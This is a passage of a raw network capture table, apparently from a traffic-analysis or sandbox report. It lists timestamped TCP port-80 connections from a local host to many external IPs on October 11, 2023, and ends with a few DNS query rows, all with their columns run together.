                                                                                                                                    Oct 11, 2023 22:55:52.464293003 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.464318991 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.464335918 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.464535952 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.464690924 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.464848995 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.465456009 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.465590000 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.465603113 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.465701103 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.465718031 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.465799093 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.465823889 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.465909004 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.465965986 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821332932 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.821417093 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.821475983 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.821531057 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.821557045 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821605921 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821641922 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.821661949 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821736097 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.821755886 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821858883 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821913004 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.821952105 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822020054 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822138071 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822185993 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.822206020 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822290897 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.822376966 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.822427034 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822494030 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822576046 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.822650909 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.822926044 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.822983980 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.823193073 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.823765039 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.823870897 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.823966980 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.823972940 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824065924 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824143887 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.824193001 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824206114 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.824301958 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.824342966 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824358940 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.824392080 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824413061 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.824521065 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824568987 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824765921 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.824807882 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.824939966 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.825089931 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.825141907 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:56.507685900 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:56.507889986 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:56:01.426523924 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:56:31.177169085 CEST5001380192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:31.415978909 CEST8050013172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:31.920159101 CEST5001380192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:32.158654928 CEST8050013172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:32.669914007 CEST5001380192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:32.908305883 CEST8050013172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:33.419889927 CEST5001380192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:33.658338070 CEST8050013172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:34.169574976 CEST5001380192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:34.409203053 CEST8050013172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:37.853737116 CEST5001480192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:38.088433027 CEST8050014172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:38.590642929 CEST5001480192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:38.825244904 CEST8050014172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:39.340440035 CEST5001480192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:39.576798916 CEST8050014172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:40.090354919 CEST5001480192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:40.324773073 CEST8050014172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:40.840130091 CEST5001480192.168.11.20172.177.169.252
                                                                                                                                    Oct 11, 2023 22:56:41.074666977 CEST8050014172.177.169.252192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:50.706363916 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.023437977 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.023660898 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.023724079 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.372153997 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372237921 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372294903 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372349024 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372406960 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372458935 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372513056 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372555971 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.372566938 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372622967 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372639894 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.372678041 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.372808933 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.372884989 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.525413990 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.690574884 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690651894 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690711021 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690766096 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690767050 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.690819979 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690876007 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690910101 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.690911055 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.690929890 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690984011 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.690985918 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.691076994 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.691127062 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.691137075 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.691174984 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.691288948 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:56:51.842700005 CEST805001591.195.240.123192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:51.842930079 CEST5001580192.168.11.2091.195.240.123
                                                                                                                                    Oct 11, 2023 22:57:10.964304924 CEST5001680192.168.11.20104.18.233.42
                                                                                                                                    Oct 11, 2023 22:57:11.130460024 CEST8050016104.18.233.42192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:11.130716085 CEST5001680192.168.11.20104.18.233.42
                                                                                                                                    Oct 11, 2023 22:57:11.130716085 CEST5001680192.168.11.20104.18.233.42
                                                                                                                                    Oct 11, 2023 22:57:11.297513962 CEST8050016104.18.233.42192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:11.300649881 CEST8050016104.18.233.42192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:11.300685883 CEST8050016104.18.233.42192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:11.301029921 CEST5001680192.168.11.20104.18.233.42
                                                                                                                                    Oct 11, 2023 22:57:11.301029921 CEST5001680192.168.11.20104.18.233.42
                                                                                                                                    Oct 11, 2023 22:57:11.467499971 CEST8050016104.18.233.42192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:51.655069113 CEST5001780192.168.11.203.64.163.50
                                                                                                                                    Oct 11, 2023 22:57:51.976149082 CEST80500173.64.163.50192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:51.976587057 CEST5001780192.168.11.203.64.163.50
                                                                                                                                    Oct 11, 2023 22:57:51.976587057 CEST5001780192.168.11.203.64.163.50
                                                                                                                                    Oct 11, 2023 22:57:52.295638084 CEST80500173.64.163.50192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:52.296363115 CEST80500173.64.163.50192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:52.296444893 CEST80500173.64.163.50192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:52.296845913 CEST5001780192.168.11.203.64.163.50
                                                                                                                                    Oct 11, 2023 22:57:52.296845913 CEST5001780192.168.11.203.64.163.50
                                                                                                                                    Oct 11, 2023 22:57:52.617050886 CEST80500173.64.163.50192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.183810949 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.359282017 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.359488964 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.359546900 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.536360979 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.678128958 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.678544044 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.679874897 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.679963112 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.680073977 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.680154085 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.680197954 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.680213928 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.680241108 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.680269957 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.680389881 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.680391073 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.680445910 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:58:13.855501890 CEST805001834.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.855756044 CEST5001880192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 22:59:14.313854933 CEST5001980192.168.11.20130.185.109.77
                                                                                                                                    Oct 11, 2023 22:59:14.630661964 CEST8050019130.185.109.77192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:14.631052971 CEST5001980192.168.11.20130.185.109.77
                                                                                                                                    Oct 11, 2023 22:59:14.631130934 CEST5001980192.168.11.20130.185.109.77
                                                                                                                                    Oct 11, 2023 22:59:14.946495056 CEST8050019130.185.109.77192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:14.946597099 CEST8050019130.185.109.77192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:14.946644068 CEST8050019130.185.109.77192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:14.947254896 CEST5001980192.168.11.20130.185.109.77
                                                                                                                                    Oct 11, 2023 22:59:14.947254896 CEST5001980192.168.11.20130.185.109.77
                                                                                                                                    Oct 11, 2023 22:59:15.262696981 CEST8050019130.185.109.77192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:35.091941118 CEST5002080192.168.11.20154.12.93.8
                                                                                                                                    Oct 11, 2023 22:59:35.267684937 CEST8050020154.12.93.8192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:35.267853022 CEST5002080192.168.11.20154.12.93.8
                                                                                                                                    Oct 11, 2023 22:59:35.376043081 CEST5002080192.168.11.20154.12.93.8
                                                                                                                                    Oct 11, 2023 22:59:35.543479919 CEST8050020154.12.93.8192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:35.545150042 CEST8050020154.12.93.8192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:35.545212030 CEST8050020154.12.93.8192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:35.545579910 CEST5002080192.168.11.20154.12.93.8
                                                                                                                                    Oct 11, 2023 22:59:35.545581102 CEST5002080192.168.11.20154.12.93.8
                                                                                                                                    Oct 11, 2023 22:59:35.713367939 CEST8050020154.12.93.8192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:57.614970922 CEST5002180192.168.11.20154.197.227.142
                                                                                                                                    Oct 11, 2023 22:59:57.794107914 CEST8050021154.197.227.142192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:57.794378996 CEST5002180192.168.11.20154.197.227.142
                                                                                                                                    Oct 11, 2023 22:59:57.794441938 CEST5002180192.168.11.20154.197.227.142
                                                                                                                                    Oct 11, 2023 22:59:58.187613010 CEST8050021154.197.227.142192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:58.297092915 CEST5002180192.168.11.20154.197.227.142
                                                                                                                                    Oct 11, 2023 22:59:58.476474047 CEST8050021154.197.227.142192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:59.100063086 CEST8050021154.197.227.142192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:59.100368977 CEST5002180192.168.11.20154.197.227.142
                                                                                                                                    Oct 11, 2023 22:59:59.100575924 CEST8050021154.197.227.142192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:59.100761890 CEST5002180192.168.11.20154.197.227.142
                                                                                                                                    Oct 11, 2023 23:00:16.032090902 CEST5002280192.168.11.20185.104.28.238
                                                                                                                                    Oct 11, 2023 23:00:16.443535089 CEST8050022185.104.28.238192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:16.443778038 CEST5002280192.168.11.20185.104.28.238
                                                                                                                                    Oct 11, 2023 23:00:16.443831921 CEST5002280192.168.11.20185.104.28.238
                                                                                                                                    Oct 11, 2023 23:00:16.782454014 CEST8050022185.104.28.238192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:16.782540083 CEST8050022185.104.28.238192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:16.782840014 CEST5002280192.168.11.20185.104.28.238
                                                                                                                                    Oct 11, 2023 23:00:16.783077002 CEST5002280192.168.11.20185.104.28.238
                                                                                                                                    Oct 11, 2023 23:00:17.105026007 CEST8050022185.104.28.238192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:36.228127003 CEST5002380192.168.11.2015.197.142.173
                                                                                                                                    Oct 11, 2023 23:00:36.460635900 CEST805002315.197.142.173192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:36.461003065 CEST5002380192.168.11.2015.197.142.173
                                                                                                                                    Oct 11, 2023 23:00:36.461050034 CEST5002380192.168.11.2015.197.142.173
                                                                                                                                    Oct 11, 2023 23:00:36.692616940 CEST805002315.197.142.173192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:36.693012953 CEST805002315.197.142.173192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:36.693075895 CEST805002315.197.142.173192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:36.693362951 CEST5002380192.168.11.2015.197.142.173
                                                                                                                                    Oct 11, 2023 23:00:36.693577051 CEST5002380192.168.11.2015.197.142.173
                                                                                                                                    Oct 11, 2023 23:00:36.925371885 CEST805002315.197.142.173192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:56.896045923 CEST5002480192.168.11.20208.91.197.39
                                                                                                                                    Oct 11, 2023 23:00:57.132940054 CEST8050024208.91.197.39192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:57.133284092 CEST5002480192.168.11.20208.91.197.39
                                                                                                                                    Oct 11, 2023 23:00:57.133284092 CEST5002480192.168.11.20208.91.197.39
                                                                                                                                    Oct 11, 2023 23:00:57.371278048 CEST8050024208.91.197.39192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:57.410998106 CEST8050024208.91.197.39192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:57.411431074 CEST5002480192.168.11.20208.91.197.39
                                                                                                                                    Oct 11, 2023 23:00:57.411616087 CEST5002480192.168.11.20208.91.197.39
                                                                                                                                    Oct 11, 2023 23:00:57.620256901 CEST8050024208.91.197.39192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:57.620657921 CEST5002480192.168.11.20208.91.197.39
                                                                                                                                    Oct 11, 2023 23:00:57.648839951 CEST8050024208.91.197.39192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:17.461376905 CEST5002580192.168.11.2018.119.154.66
                                                                                                                                    Oct 11, 2023 23:01:17.694283009 CEST805002518.119.154.66192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:17.694526911 CEST5002580192.168.11.2018.119.154.66
                                                                                                                                    Oct 11, 2023 23:01:17.694616079 CEST5002580192.168.11.2018.119.154.66
                                                                                                                                    Oct 11, 2023 23:01:17.927550077 CEST805002518.119.154.66192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:17.927615881 CEST805002518.119.154.66192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:17.928064108 CEST5002580192.168.11.2018.119.154.66
                                                                                                                                    Oct 11, 2023 23:01:17.928064108 CEST5002580192.168.11.2018.119.154.66
                                                                                                                                    Oct 11, 2023 23:01:18.160725117 CEST805002518.119.154.66192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.052288055 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.232425928 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.232800961 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.232801914 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.408894062 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.549660921 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.550118923 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.551999092 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.552156925 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.553028107 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.553029060 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.557723045 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.557792902 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.557837009 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.557879925 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.558008909 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.558008909 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.558320999 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:00.725831032 CEST805002634.120.249.181192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:00.726249933 CEST5002680192.168.11.2034.120.249.181
                                                                                                                                    Oct 11, 2023 23:02:19.070638895 CEST5002780192.168.11.20104.247.82.94
                                                                                                                                    Oct 11, 2023 23:02:19.313406944 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:19.314013958 CEST5002780192.168.11.20104.247.82.94
                                                                                                                                    Oct 11, 2023 23:02:19.557720900 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:19.557969093 CEST5002780192.168.11.20104.247.82.94
                                                                                                                                    Oct 11, 2023 23:02:19.800868988 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:19.800935984 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:19.800981045 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:19.801250935 CEST5002780192.168.11.20104.247.82.94
                                                                                                                                    Oct 11, 2023 23:02:19.801250935 CEST5002780192.168.11.20104.247.82.94
                                                                                                                                    Oct 11, 2023 23:02:20.008392096 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:20.008651972 CEST5002780192.168.11.20104.247.82.94
                                                                                                                                    Oct 11, 2023 23:02:20.044275045 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:20.251121044 CEST8050027104.247.82.94192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:39.664194107 CEST5002880192.168.11.2052.20.84.62
                                                                                                                                    Oct 11, 2023 23:02:39.898385048 CEST805002852.20.84.62192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:39.898714066 CEST5002880192.168.11.2052.20.84.62
                                                                                                                                    Oct 11, 2023 23:02:39.898715019 CEST5002880192.168.11.2052.20.84.62
                                                                                                                                    Oct 11, 2023 23:02:40.132354975 CEST805002852.20.84.62192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:40.132421970 CEST805002852.20.84.62192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:40.132467985 CEST805002852.20.84.62192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:40.132774115 CEST5002880192.168.11.2052.20.84.62
                                                                                                                                    Oct 11, 2023 23:02:40.132775068 CEST5002880192.168.11.2052.20.84.62
                                                                                                                                    Oct 11, 2023 23:02:40.365951061 CEST805002852.20.84.62192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:21.208307028 CEST5002980192.168.11.20158.247.235.89
                                                                                                                                    Oct 11, 2023 23:03:21.517761946 CEST8050029158.247.235.89192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:21.518038988 CEST5002980192.168.11.20158.247.235.89
                                                                                                                                    Oct 11, 2023 23:03:21.518776894 CEST5002980192.168.11.20158.247.235.89
                                                                                                                                    Oct 11, 2023 23:03:21.828088999 CEST8050029158.247.235.89192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:21.828180075 CEST8050029158.247.235.89192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:21.828229904 CEST8050029158.247.235.89192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:21.828556061 CEST5002980192.168.11.20158.247.235.89
                                                                                                                                    Oct 11, 2023 23:03:21.828556061 CEST5002980192.168.11.20158.247.235.89
                                                                                                                                    Oct 11, 2023 23:03:22.138191938 CEST8050029158.247.235.89192.168.11.20
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Oct 11, 2023 22:56:31.002636909 CEST5557253192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:56:31.176006079 CEST53555721.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:37.672872066 CEST6429653192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:56:37.844975948 CEST53642961.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:56:50.416889906 CEST5178353192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:56:50.705388069 CEST53517831.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:10.740294933 CEST4962953192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:57:10.963449001 CEST53496291.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:57:51.482726097 CEST5276153192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:57:51.654177904 CEST53527611.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:12.039556980 CEST5390853192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:58:13.054533005 CEST5390853192.168.11.209.9.9.9
                                                                                                                                    Oct 11, 2023 22:58:13.182753086 CEST53539081.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:13.453666925 CEST53539089.9.9.9192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:32.597459078 CEST5496253192.168.11.201.1.1.1
